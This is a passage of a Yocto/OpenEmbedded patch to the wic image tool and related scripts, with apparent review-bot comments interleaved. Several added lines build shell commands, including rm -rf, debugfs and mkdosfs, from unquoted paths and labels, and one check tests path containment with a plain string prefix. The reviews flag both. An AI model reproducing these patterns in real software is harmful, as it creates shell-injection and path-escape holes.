+ ignore_paths = ",".join(canonical_paths)
+
+ pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
+ pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+ pseudo += "export PSEUDO_PASSWD=%s;" % rootfs_dir
+ pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+ pseudo += "export PSEUDO_IGNORE_PATHS=%s;" % ignore_paths
+ pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+ else:
+ pseudo = None
+
if not self.size and real_rootfs:
# The rootfs size is not set in .ks file so try to get it
# from bitbake variable
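Review bot: In the `pseudo_dir` branch of `prepare_rootfs`, an unset or empty `PSEUDO_IGNORE_PATHS` yields `[""]` from `.split(",")`, and `os.path.realpath("")` resolves to the current working directory. The cwd therefore ends up in the exported `PSEUDO_IGNORE_PATHS`, which tells pseudo to ignore everything below it. Empty entries should be skipped in the filter: `if path and "$" not in path:`. The `path.endswith("/") and "/" or ""` idiom on the following line reads more plainly as `"/" if path.endswith("/") else ""`. The function continues past the end of this hunk.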
@@ -235,7 +254,7 @@ class Partition():
prefix = "ext" if self.fstype.startswith("ext") else self.fstype
method = getattr(self, "prepare_rootfs_" + prefix)
- method(rootfs, oe_builddir, rootfs_dir, native_sysroot, pseudo)
+ method(rootfs, cr_workdir, oe_builddir, rootfs_dir, native_sysroot, pseudo)
self.source_file = rootfs
# get the rootfs size in the right units for kickstart (kB)
@@ -243,7 +262,7 @@ class Partition():
out = exec_cmd(du_cmd)
self.size = int(out.split()[0])
- def prepare_rootfs_ext(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_ext(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for an ext2/3/4 rootfs partition.
@@ -267,10 +286,21 @@ class Partition():
(self.fstype, extraopts, rootfs, label_str, self.fsuuid, rootfs_dir)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
+ if self.updated_fstab_path and self.has_fstab:
+ debugfs_script_path = os.path.join(cr_workdir, "debugfs_script")
+ with open(debugfs_script_path, "w") as f:
+ f.write("cd etc\n")
+ f.write("rm fstab\n")
+ f.write("write %s fstab\n" % (self.updated_fstab_path))
+ debugfs_cmd = "debugfs -w -f %s %s" % (debugfs_script_path, rootfs)
+ exec_native_cmd(debugfs_cmd, native_sysroot)
+
mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
- def prepare_rootfs_btrfs(self, rootfs, oe_builddir, rootfs_dir,
+ self.check_for_Y2038_problem(rootfs, native_sysroot)
+
+ def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a btrfs rootfs partition.
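Review bot: `debugfs_cmd` in `prepare_rootfs_ext` is built with `%` formatting from `debugfs_script_path` and `rootfs`, and `exec_native_cmd` hands the string to a shell (misc.py prefixes `export PATH=...;` and calls `_exec_cmd(..., True)`), so a work directory containing a space or a shell metacharacter changes what is run; with the new `--workdir` option that directory is chosen by the caller. The same pattern is in the `mcopy ... ::/etc/fstab` hunk further down, the `mkdosfs -n %s` label in bootimg-pcbios.py, and the `rm -rf %s` and `install -m 0644 %s %s` commands in plugins/source/rootfs.py, where the `rm -rf` argument comes from `os.listdir()` of the rootfs copy and replaces `shutil.rmtree`/`os.remove` calls that never went through a shell. Each interpolated path or label should be wrapped with `shlex.quote()` (needs `import shlex`), e.g. `"debugfs -w -f %s %s" % (shlex.quote(debugfs_script_path), shlex.quote(rootfs))`. `prepare_rootfs_ext` starts before this hunk.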
@@ -293,7 +323,7 @@ class Partition():
self.mkfs_extraopts, self.fsuuid, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
- def prepare_rootfs_msdos(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_msdos(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a msdos/vfat rootfs partition.
@@ -322,12 +352,16 @@ class Partition():
mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (rootfs, rootfs_dir)
exec_native_cmd(mcopy_cmd, native_sysroot)
+ if self.updated_fstab_path and self.has_fstab:
+ mcopy_cmd = "mcopy -i %s %s ::/etc/fstab" % (rootfs, self.updated_fstab_path)
+ exec_native_cmd(mcopy_cmd, native_sysroot)
+
chmod_cmd = "chmod 644 %s" % rootfs
exec_cmd(chmod_cmd)
prepare_rootfs_vfat = prepare_rootfs_msdos
- def prepare_rootfs_squashfs(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_squashfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a squashfs rootfs partition.
@@ -356,6 +390,8 @@ class Partition():
(self.fstype, extraopts, label_str, self.fsuuid, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot)
+ self.check_for_Y2038_problem(rootfs, native_sysroot)
+
def prepare_empty_partition_btrfs(self, rootfs, oe_builddir,
native_sysroot):
"""
@@ -417,3 +453,37 @@ class Partition():
mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path)
exec_native_cmd(mkswap_cmd, native_sysroot)
+
+ def check_for_Y2038_problem(self, rootfs, native_sysroot):
+ """
+ Check if the filesystem is affected by the Y2038 problem
+ (Y2038 problem = 32 bit time_t overflow in January 2038)
+ """
+ def get_err_str(part):
+ err = "The {} filesystem {} has no Y2038 support."
+ if part.mountpoint:
+ args = [part.fstype, "mounted at %s" % part.mountpoint]
+ elif part.label:
+ args = [part.fstype, "labeled '%s'" % part.label]
+ elif part.part_name:
+ args = [part.fstype, "in partition '%s'" % part.part_name]
+ else:
+ args = [part.fstype, "in partition %s" % part.num]
+ return err.format(*args)
+
+ # ext2 and ext3 are always affected by the Y2038 problem
+ if self.fstype in ["ext2", "ext3"]:
+ logger.warn(get_err_str(self))
+ return
+
+ ret, out = exec_native_cmd("dumpe2fs %s" % rootfs, native_sysroot)
+
+ # if ext4 is affected by the Y2038 problem depends on the inode size
+ for line in out.splitlines():
+ if line.startswith("Inode size:"):
+ size = int(line.split(":")[1].strip())
+ if size < 256:
+ logger.warn("%s Inodes (of size %d) are too small." %
+ (get_err_str(self), size))
+ break
+
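Review bot: `ret` from the `dumpe2fs` call in `check_for_Y2038_problem` is never examined, so if the tool fails (and `exec_native_cmd` does not raise, which this hunk does not show) the loop finds no `Inode size:` line and the check passes silently. A guard such as `if ret != 0: logger.warning("dumpe2fs failed on %s, Y2038 check skipped", rootfs); return` makes that visible. `logger.warn` is a deprecated alias; `logger.warning` is the supported spelling, both here and in the `logger.warn` call added to plugins/source/rootfs.py.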
diff --git a/scripts/lib/wic/pluginbase.py b/scripts/lib/wic/pluginbase.py
index d9b4e57747..b64568339b 100644
--- a/scripts/lib/wic/pluginbase.py
+++ b/scripts/lib/wic/pluginbase.py
@@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin']
import os
import logging
+import types
from collections import defaultdict
-from importlib.machinery import SourceFileLoader
+import importlib
+import importlib.util
from wic import WicError
from wic.misc import get_bitbake_var
@@ -54,7 +56,9 @@ class PluginMgr:
mname = fname[:-3]
mpath = os.path.join(ppath, fname)
logger.debug("loading plugin module %s", mpath)
- SourceFileLoader(mname, mpath).load_module()
+ spec = importlib.util.spec_from_file_location(mname, mpath)
+ module = importlib.util.module_from_spec(spec)
+ spec.loader.exec_module(module)
return PLUGINS.get(ptype)
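Review bot: The module created in the plugin loader is executed but never registered, whereas `SourceFileLoader.load_module()` put it in `sys.modules`. Code that later looks a plugin up by module name (pickling, `inspect`, a second import) would behave differently, though whether any wic plugin relies on that is not visible here. The importlib recipe adds `sys.modules[mname] = module` before `spec.loader.exec_module(module)`, which needs `import sys` if the file lacks it. The enclosing method starts before this hunk.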
diff --git a/scripts/lib/wic/plugins/imager/direct.py b/scripts/lib/wic/plugins/imager/direct.py
index 55db826e93..42704d1e10 100644
--- a/scripts/lib/wic/plugins/imager/direct.py
+++ b/scripts/lib/wic/plugins/imager/direct.py
@@ -58,11 +58,11 @@ class DirectPlugin(ImagerPlugin):
self.compressor = options.compressor
self.bmap = options.bmap
self.no_fstab_update = options.no_fstab_update
- self.original_fstab = None
+ self.updated_fstab_path = None
self.name = "%s-%s" % (os.path.splitext(os.path.basename(wks_file))[0],
strftime("%Y%m%d%H%M"))
- self.workdir = tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+ self.workdir = self.setup_workdir(options.workdir)
self._image = None
self.ptable_format = self.ks.bootloader.ptable
self.parts = self.ks.partitions
@@ -78,6 +78,16 @@ class DirectPlugin(ImagerPlugin):
self._image = PartitionedImage(image_path, self.ptable_format,
self.parts, self.native_sysroot)
+ def setup_workdir(self, workdir):
+ if workdir:
+ if os.path.exists(workdir):
+ raise WicError("Internal workdir '%s' specified in wic arguments already exists!" % (workdir))
+
+ os.makedirs(workdir)
+ return workdir
+ else:
+ return tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+
def do_create(self):
"""
Plugin entry point.
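Review bot: `setup_workdir` creates a caller-supplied work directory with `os.makedirs(workdir)`, i.e. with whatever the umask allows, while the fallback `tempfile.mkdtemp()` always creates a directory accessible only to its owner. The work directory later holds the rootfs copies and the copied pseudo database (see plugins/source/rootfs.py), so the two paths should match. The `os.path.exists()` pre-check is redundant with `os.makedirs()`, which already raises `FileExistsError` for an existing leaf; catching that keeps the error a `WicError` even when the directory appears between check and create. The method has no docstring; one line saying that an existing directory is refused because the work directory is removed with `shutil.rmtree` at the end of the run would help.

```python
def setup_workdir(self, workdir):
    if not workdir:
        return tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
    try:
        # same owner-only mode that mkdtemp() uses
        os.makedirs(workdir, mode=0o700)
    except FileExistsError:
        raise WicError("Internal workdir '%s' specified in wic arguments already exists!" % (workdir))
    return workdir
```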
@@ -90,11 +100,8 @@ class DirectPlugin(ImagerPlugin):
finally:
self.cleanup()
- def _write_fstab(self, image_rootfs):
- """overriden to generate fstab (temporarily) in rootfs. This is called
- from _create, make sure it doesn't get called from
- BaseImage.create()
- """
+ def update_fstab(self, image_rootfs):
+ """Assume partition order same as in wks"""
if not image_rootfs:
return
@@ -104,20 +111,11 @@ class DirectPlugin(ImagerPlugin):
with open(fstab_path) as fstab:
fstab_lines = fstab.readlines()
- self.original_fstab = fstab_lines.copy()
-
- if self._update_fstab(fstab_lines, self.parts):
- with open(fstab_path, "w") as fstab:
- fstab.writelines(fstab_lines)
- else:
- self.original_fstab = None
- def _update_fstab(self, fstab_lines, parts):
- """Assume partition order same as in wks"""
updated = False
- for part in parts:
+ for part in self.parts:
if not part.realnum or not part.mountpoint \
- or part.mountpoint == "/":
+ or part.mountpoint == "/" or not (part.mountpoint.startswith('/') or part.mountpoint == "swap"):
continue
if part.use_uuid:
@@ -144,7 +142,10 @@ class DirectPlugin(ImagerPlugin):
fstab_lines.append(line)
updated = True
- return updated
+ if updated:
+ self.updated_fstab_path = os.path.join(self.workdir, "fstab")
+ with open(self.updated_fstab_path, "w") as f:
+ f.writelines(fstab_lines)
def _full_path(self, path, name, extention):
""" Construct full file path to a file we generate. """
@@ -160,7 +161,7 @@ class DirectPlugin(ImagerPlugin):
a partitioned image.
"""
if not self.no_fstab_update:
- self._write_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
+ self.update_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
for part in self.parts:
# get rootfs size from bitbake variable if it's not set in .ks file
@@ -273,12 +274,6 @@ class DirectPlugin(ImagerPlugin):
if os.path.isfile(path):
shutil.move(path, os.path.join(self.outdir, fname))
- #Restore original fstab
- if self.original_fstab:
- fstab_path = self.rootfs_dir.get("ROOTFS_DIR") + "/etc/fstab"
- with open(fstab_path, "w") as fstab:
- fstab.writelines(self.original_fstab)
-
# remove work directory
shutil.rmtree(self.workdir, ignore_errors=True)
@@ -343,6 +338,13 @@ class PartitionedImage():
part.fsuuid = '0x' + str(uuid.uuid4())[:8].upper()
else:
part.fsuuid = str(uuid.uuid4())
+ else:
+ #make sure the fsuuid for vfat/msdos align with format 0xYYYYYYYY
+ if part.fstype == 'vfat' or part.fstype == 'msdos':
+ if part.fsuuid.upper().startswith("0X"):
+ part.fsuuid = '0x' + part.fsuuid.upper()[2:].rjust(8,"0")
+ else:
+ part.fsuuid = '0x' + part.fsuuid.upper().rjust(8,"0")
def prepare(self, imager):
"""Prepare an image. Call prepare method of all image partitions."""
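Review bot: The new `else` branch pads a user-supplied `fsuuid` for vfat/msdos but never validates it, so a value longer than eight digits or containing non-hex characters passes through with only the `0x` prefix normalised. It then reaches the `mkdosfs -i %s` command line built in bootimg-pcbios.py. Rejecting it here gives a clear error; after stripping the prefix into `digits`: `if len(digits) > 8 or any(c not in "0123456789ABCDEF" for c in digits): raise WicError("Invalid vfat/msdos fsuuid: %s" % part.fsuuid)`. The two `rjust` branches then collapse into one assignment, `part.fsuuid = '0x' + digits.rjust(8, "0")`. The enclosing method starts outside this hunk.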
@@ -351,7 +353,8 @@ class PartitionedImage():
# sizes before we can add them and do the layout.
part.prepare(imager, imager.workdir, imager.oe_builddir,
imager.rootfs_dir, imager.bootimg_dir,
- imager.kernel_dir, imager.native_sysroot)
+ imager.kernel_dir, imager.native_sysroot,
+ imager.updated_fstab_path)
# Converting kB to sectors for parted
part.size_sec = part.disk_size * 1024 // self.sector_size
diff --git a/scripts/lib/wic/plugins/source/bootimg-efi.py b/scripts/lib/wic/plugins/source/bootimg-efi.py
index 2cfdc10ecd..05e8471116 100644
--- a/scripts/lib/wic/plugins/source/bootimg-efi.py
+++ b/scripts/lib/wic/plugins/source/bootimg-efi.py
@@ -277,6 +277,13 @@ class BootimgEFIPlugin(SourcePlugin):
logger.debug("Added %d extra blocks to %s to get to %d total blocks",
extra_blocks, part.mountpoint, blocks)
+ # required for compatibility with certain devices expecting file system
+ # block count to be equal to partition block count
+ if blocks < part.fixed_size:
+ blocks = part.fixed_size
+ logger.debug("Overriding %s to %d total blocks for compatibility",
+ part.mountpoint, blocks)
+
# dosfs image, created by mkdosfs
bootimg = "%s/boot.img" % cr_workdir
diff --git a/scripts/lib/wic/plugins/source/bootimg-partition.py b/scripts/lib/wic/plugins/source/bootimg-partition.py
index 138986a71e..5dbe2558d2 100644
--- a/scripts/lib/wic/plugins/source/bootimg-partition.py
+++ b/scripts/lib/wic/plugins/source/bootimg-partition.py
@@ -141,7 +141,7 @@ class BootimgPartitionPlugin(SourcePlugin):
break
if not kernel_name:
- raise WicError('No kernel file founded')
+ raise WicError('No kernel file found')
# Compose the extlinux.conf
extlinux_conf = "default Yocto\n"
diff --git a/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
index f2639e7004..32e47f1831 100644
--- a/scripts/lib/wic/plugins/source/bootimg-pcbios.py
+++ b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
@@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin):
# dosfs image, created by mkdosfs
bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno)
- dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \
- (part.fsuuid, bootimg, blocks)
+ label = part.label if part.label else "boot"
+
+ dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \
+ (label, part.fsuuid, bootimg, blocks)
exec_native_cmd(dosfs_cmd, native_sysroot)
mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir)
diff --git a/scripts/lib/wic/plugins/source/rootfs.py b/scripts/lib/wic/plugins/source/rootfs.py
index 705aeb5563..c8c1c0f58f 100644
--- a/scripts/lib/wic/plugins/source/rootfs.py
+++ b/scripts/lib/wic/plugins/source/rootfs.py
@@ -20,7 +20,7 @@ from oe.path import copyhardlinktree
from wic import WicError
from wic.pluginbase import SourcePlugin
-from wic.misc import get_bitbake_var
+from wic.misc import get_bitbake_var, exec_native_cmd
logger = logging.getLogger('wic')
@@ -44,6 +44,15 @@ class RootfsPlugin(SourcePlugin):
return os.path.realpath(image_rootfs_dir)
+ @staticmethod
+ def __get_pseudo(native_sysroot, rootfs, pseudo_dir):
+ pseudo = "export PSEUDO_PREFIX=%s/usr;" % native_sysroot
+ pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+ pseudo += "export PSEUDO_PASSWD=%s;" % rootfs
+ pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+ pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+ return pseudo
+
@classmethod
def do_prepare_partition(cls, part, source_params, cr, cr_workdir,
oe_builddir, bootimg_dir, kernel_dir,
@@ -68,18 +77,55 @@ class RootfsPlugin(SourcePlugin):
"it is not a valid path, exiting" % part.rootfs_dir)
part.rootfs_dir = cls.__get_rootfs_dir(rootfs_dir)
+ part.has_fstab = os.path.exists(os.path.join(part.rootfs_dir, "etc/fstab"))
+ pseudo_dir = os.path.join(part.rootfs_dir, "../pseudo")
+ if not os.path.lexists(pseudo_dir):
+ logger.warn("%s folder does not exist. "
+ "Usernames and permissions will be invalid " % pseudo_dir)
+ pseudo_dir = None
new_rootfs = None
+ new_pseudo = None
# Handle excluded paths.
- if part.exclude_path or part.include_path:
- # We need a new rootfs directory we can delete files from. Copy to
- # workdir.
+ if part.exclude_path or part.include_path or part.change_directory or part.update_fstab_in_rootfs:
+ # We need a new rootfs directory we can safely modify without
+ # interfering with other tasks. Copy to workdir.
new_rootfs = os.path.realpath(os.path.join(cr_workdir, "rootfs%d" % part.lineno))
if os.path.lexists(new_rootfs):
shutil.rmtree(os.path.join(new_rootfs))
- copyhardlinktree(part.rootfs_dir, new_rootfs)
+ if part.change_directory:
+ cd = part.change_directory
+ if cd[-1] == '/':
+ cd = cd[:-1]
+ if os.path.isabs(cd):
+ logger.error("Must be relative: --change-directory=%s" % cd)
+ sys.exit(1)
+ orig_dir = os.path.realpath(os.path.join(part.rootfs_dir, cd))
+ if not orig_dir.startswith(part.rootfs_dir):
+ logger.error("'%s' points to a path outside the rootfs" % orig_dir)
+ sys.exit(1)
+
+ else:
+ orig_dir = part.rootfs_dir
+ copyhardlinktree(orig_dir, new_rootfs)
+
+ # Convert the pseudo directory to its new location
+ if (pseudo_dir):
+ new_pseudo = os.path.realpath(
+ os.path.join(cr_workdir, "pseudo%d" % part.lineno))
+ if os.path.lexists(new_pseudo):
+ shutil.rmtree(new_pseudo)
+ os.mkdir(new_pseudo)
+ shutil.copy(os.path.join(pseudo_dir, "files.db"),
+ os.path.join(new_pseudo, "files.db"))
+
+ pseudo_cmd = "%s -B -m %s -M %s" % (cls.__get_pseudo(native_sysroot,
+ new_rootfs,
+ new_pseudo),
+ orig_dir, new_rootfs)
+ exec_native_cmd(pseudo_cmd, native_sysroot)
for path in part.include_path or []:
copyhardlinktree(path, new_rootfs)
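Review bot: The containment test for `--change-directory`, `orig_dir.startswith(part.rootfs_dir)`, is a plain string-prefix check. A resolved path in a sibling directory whose name merely begins with the rootfs path (constructed example: rootfs `/work/rootfs`, target `/work/rootfs-old/etc`) is accepted as inside the rootfs and then copied into the image. Comparing path components closes that: `if os.path.commonpath([orig_dir, part.rootfs_dir]) != part.rootfs_dir:`. The exclude-path check in the next hunk's context reports the same error message and may use the same test, so it is worth checking too. `do_prepare_partition` begins before this hunk and continues after it.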
@@ -99,17 +145,34 @@ class RootfsPlugin(SourcePlugin):
logger.error("'%s' points to a path outside the rootfs" % orig_path)
sys.exit(1)
+ if new_pseudo:
+ pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+ else:
+ pseudo = None
if path.endswith(os.sep):
# Delete content only.
for entry in os.listdir(full_path):
full_entry = os.path.join(full_path, entry)
- if os.path.isdir(full_entry) and not os.path.islink(full_entry):
- shutil.rmtree(full_entry)
- else:
- os.remove(full_entry)
+ rm_cmd = "rm -rf %s" % (full_entry)
+ exec_native_cmd(rm_cmd, native_sysroot, pseudo)
else:
# Delete whole directory.
- shutil.rmtree(full_path)
+ rm_cmd = "rm -rf %s" % (full_path)
+ exec_native_cmd(rm_cmd, native_sysroot, pseudo)
+
+ # Update part.has_fstab here as fstab may have been added or
+ # removed by the above modifications.
+ part.has_fstab = os.path.exists(os.path.join(new_rootfs, "etc/fstab"))
+ if part.update_fstab_in_rootfs and part.has_fstab:
+ fstab_path = os.path.join(new_rootfs, "etc/fstab")
+ # Assume that fstab should always be owned by root with fixed permissions
+ install_cmd = "install -m 0644 %s %s" % (part.updated_fstab_path, fstab_path)
+ if new_pseudo:
+ pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+ else:
+ pseudo = None
+ exec_native_cmd(install_cmd, native_sysroot, pseudo)
part.prepare_rootfs(cr_workdir, oe_builddir,
- new_rootfs or part.rootfs_dir, native_sysroot)
+ new_rootfs or part.rootfs_dir, native_sysroot,
+ pseudo_dir = new_pseudo or pseudo_dir)
diff --git a/scripts/nativesdk-intercept/chgrp b/scripts/nativesdk-intercept/chgrp
new file mode 100755
index 0000000000..30cc417d3a
--- /dev/null
+++ b/scripts/nativesdk-intercept/chgrp
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chgrp' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chgrp'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chgrp = shutil.which('chgrp', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+ if i.startswith("-"):
+ args.append(i)
+ continue
+ if not found:
+ args.append("root")
+ found = True
+ else:
+ args.append(i)
+
+os.execv(real_chgrp, args)
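Review bot: The argument loop iterates over all of `sys.argv`, so the first non-option it meets is the script path in `sys.argv[0]`. That element is what becomes `"root"`, and the group the caller passed is appended unchanged, so the wrapper as written redirects nothing and hands the real tool an `argv[0]` of `root`. Starting from the real program and skipping element 0 gives the behaviour the header comment describes: `args = [real_chgrp]` and `for i in sys.argv[1:]:`. `shutil.which()` can also return `None`, which `os.execv` turns into a `TypeError`; an explicit `sys.exit("chgrp not found in PATH")` is clearer. The chown wrapper added next has the identical loop.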
diff --git a/scripts/nativesdk-intercept/chown b/scripts/nativesdk-intercept/chown
new file mode 100755
index 0000000000..3914b3e384
--- /dev/null
+++ b/scripts/nativesdk-intercept/chown
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chown' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chown'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chown = shutil.which('chown', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+ if i.startswith("-"):
+ args.append(i)
+ continue
+ if not found:
+ args.append("root:root")
+ found = True
+ else:
+ args.append(i)
+
+os.execv(real_chown, args)
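Review bot: Removing the wrapper's directory with `path.replace(os.path.dirname(sys.argv[0]), '')` leaves an empty element in PATH (`a::b`, or a leading `:`). `shutil.which()` joins that empty directory with the command name, so the current working directory is searched for `chown`. The substring replace also mangles any other PATH entry that contains the wrapper directory as a substring. Filtering whole entries avoids both: `path = os.pathsep.join(p for p in path.split(os.pathsep) if p and p != os.path.dirname(sys.argv[0]))`. The chgrp wrapper added just before computes its PATH the same way.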
diff --git a/scripts/oe-depends-dot b/scripts/oe-depends-dot
index 5eb3e12769..1c2d51c6ec 100755
--- a/scripts/oe-depends-dot
+++ b/scripts/oe-depends-dot
@@ -15,7 +15,7 @@ class Dot(object):
def __init__(self):
parser = argparse.ArgumentParser(
description="Analyse recipe-depends.dot generated by bitbake -g",
- epilog="Use %(prog)s --help to get help")
+ formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("dotfile",
help = "Specify the dotfile", nargs = 1, action='store', default='')
parser.add_argument("-k", "--key",
@@ -32,6 +32,21 @@ class Dot(object):
" For example, A->B, B->C, A->C, then A->C can be removed.",
action="store_true", default=False)
+ parser.epilog = """
+Examples:
+First generate the .dot file:
+ bitbake -g core-image-minimal
+
+To find out why a package is being built:
+ %(prog)s -k <package> -w ./task-depends.dot
+
+To find out what a package depends on:
+ %(prog)s -k <package> -d ./task-depends.dot
+
+Reduce the .dot file packages only, no tasks:
+ %(prog)s -r ./task-depends.dot
+"""
+
self.args = parser.parse_args()
if len(sys.argv) != 3 and len(sys.argv) < 5:
@@ -99,6 +114,10 @@ class Dot(object):
if key == "meta-world-pkgdata":
continue
dep = m.group(2)
+ key = key.split('.')[0]
+ dep = dep.split('.')[0]
+ if key == dep:
+ continue
if key in depends:
if not key in depends[key]:
depends[key].add(dep)
diff --git a/scripts/oe-pkgdata-browser b/scripts/oe-pkgdata-browser
index 8d223185a4..65a6ee956e 100755
--- a/scripts/oe-pkgdata-browser
+++ b/scripts/oe-pkgdata-browser
@@ -236,6 +236,8 @@ class PkgUi():
update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False)
def load_recipes(self):
+ if not os.path.exists(pkgdata):
+ sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata)
for recipe in sorted(os.listdir(pkgdata)):
if os.path.isfile(os.path.join(pkgdata, recipe)):
self.recipe_iters[recipe] = self.recipe_store.append([recipe])
diff --git a/scripts/oe-pkgdata-util b/scripts/oe-pkgdata-util
index 93220e3617..75dd23efa3 100755
--- a/scripts/oe-pkgdata-util
+++ b/scripts/oe-pkgdata-util
@@ -598,6 +598,9 @@ def main():
logger.error("Unable to find bitbake by searching parent directory of this script or PATH")
sys.exit(1)
logger.debug('Found bitbake path: %s' % bitbakepath)
+ if not os.environ.get('BUILDDIR', ''):
+ logger.error("This script can only be run after initialising the build environment (e.g. by using oe-init-build-env)")
+ sys.exit(1)
tinfoil = tinfoil_init()
try:
args.pkgdata_dir = tinfoil.config_data.getVar('PKGDATA_DIR')
diff --git a/scripts/oe-run-native b/scripts/oe-run-native
index 4e63e69cc4..22958d97e7 100755
--- a/scripts/oe-run-native
+++ b/scripts/oe-run-native
@@ -43,7 +43,7 @@ fi
OLD_PATH=$PATH
# look for a tool only in native sysroot
-PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin/*-native -maxdepth 1 -type d -printf ":%p")
+PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin -maxdepth 1 -name "*-native" -type d -printf ":%p")
tool_find=`/usr/bin/which $tool 2>/dev/null`
if [ -n "$tool_find" ] ; then
diff --git a/scripts/oe-setup-builddir b/scripts/oe-setup-builddir
index 30eaa8efbe..5a51fa793f 100755
--- a/scripts/oe-setup-builddir
+++ b/scripts/oe-setup-builddir
@@ -113,10 +113,10 @@ if [ ! -z "$SHOWYPDOC" ]; then
cat <<EOM
The Yocto Project has extensive documentation about OE including a reference
manual which can be found at:
- http://yoctoproject.org/documentation
+ https://docs.yoctoproject.org
For more information about OpenEmbedded see their website:
- http://www.openembedded.org/
+ https://www.openembedded.org/
EOM
# unset SHOWYPDOC
diff --git a/scripts/postinst-intercepts/update_font_cache b/scripts/postinst-intercepts/update_font_cache
index 46bdb8c572..900db042d6 100644
--- a/scripts/postinst-intercepts/update_font_cache
+++ b/scripts/postinst-intercepts/update_font_cache
@@ -5,6 +5,8 @@
set -e
+rm -f $D${fontconfigcachedir}/CACHEDIR.TAG
+
PSEUDO_UNLOAD=1 ${binprefix}qemuwrapper -L $D -E ${fontconfigcacheenv} $D${libexecdir}/${binprefix}fc-cache --sysroot=$D --system-only ${fontconfigcacheparams}
chown -R root:root $D${fontconfigcachedir}
diff --git a/scripts/pybootchartgui/pybootchartgui/draw.py b/scripts/pybootchartgui/pybootchartgui/draw.py
index 53324b9f8b..fc708b55c3 100644
--- a/scripts/pybootchartgui/pybootchartgui/draw.py
+++ b/scripts/pybootchartgui/pybootchartgui/draw.py
@@ -267,11 +267,14 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range):
# avoid divide by zero
if max_y == 0:
max_y = 1.0
- xscale = float (chart_bounds[2]) / (max_x - x_shift)
+ if (max_x - x_shift):
+ xscale = float (chart_bounds[2]) / (max_x - x_shift)
+ else:
+ xscale = float (chart_bounds[2])
# If data_range is given, scale the chart so that the value range in
# data_range matches the chart bounds exactly.
# Otherwise, scale so that the actual data matches the chart bounds.
- if data_range:
+ if data_range and (data_range[1] - data_range[0]):
yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0])
ybase = data_range[0]
else:
diff --git a/scripts/pybootchartgui/pybootchartgui/parsing.py b/scripts/pybootchartgui/pybootchartgui/parsing.py
index b42dac6b88..9d6787ec5a 100644
--- a/scripts/pybootchartgui/pybootchartgui/parsing.py
+++ b/scripts/pybootchartgui/pybootchartgui/parsing.py
@@ -128,7 +128,7 @@ class Trace:
def compile(self, writer):
def find_parent_id_for(pid):
- if pid is 0:
+ if pid == 0:
return 0
ppid = self.parent_map.get(pid)
if ppid:
diff --git a/scripts/relocate_sdk.py b/scripts/relocate_sdk.py
index 8c0fdb986a..8079d13750 100755
--- a/scripts/relocate_sdk.py
+++ b/scripts/relocate_sdk.py
@@ -97,11 +97,12 @@ def change_interpreter(elf_file_name):
if (len(new_dl_path) >= p_filesz):
print("ERROR: could not relocate %s, interp size = %i and %i is needed." \
